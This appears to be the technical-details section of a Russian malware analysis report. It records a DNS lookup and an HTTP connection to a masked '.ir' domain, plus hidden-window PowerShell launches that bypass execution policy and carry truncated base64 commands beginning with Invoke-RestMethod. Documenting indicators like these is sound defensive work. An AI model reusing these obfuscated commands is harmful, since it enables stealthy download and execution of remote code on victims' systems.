Техническая информация
- 'bo###group.ir':80
- DNS ASK bo###group.ir
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' CMd /k POwErShELl.eXe -EX byPaSs -nOp -W 1 -EC IAAJAAkACQAJAAkACQBJAG4AdgBvAGsAZQAtAHIAZQBzAHQATQBFAHQASABPAGQAIAAtAFUAUgBpACAAIAAoAFsAYwBI... (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /k POwErShELl.eXe -EX byPaSs -nOp -W 1 -EC IAAJAAkACQAJAAkACQBJAG4AdgBvAGsAZQAtAHIAZQBzAHQATQBFAHQASABPAGQAIAAtAFUAUgBpACAAIAAoAFsAYwBIAGEAcgBdACAAIAAgADEAMAA0ACAAIAAgACAAIAAgACsAIAAgACAAWwBjAG...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -EX byPaSs -nOp -W 1 -EC IAAJAAkACQAJAAkACQBJAG4AdgBvAGsAZQAtAHIAZQBzAHQATQBFAHQASABPAGQAIAAtAFUAUgBpACAAIAAoAFsAYwBIAGEAcgBdACAAIAAgADEAMAA0ACAAIAAgACAAIAAgACsAIAAgACAAWwBjAGgAYQBSAF0AIAAgACAA...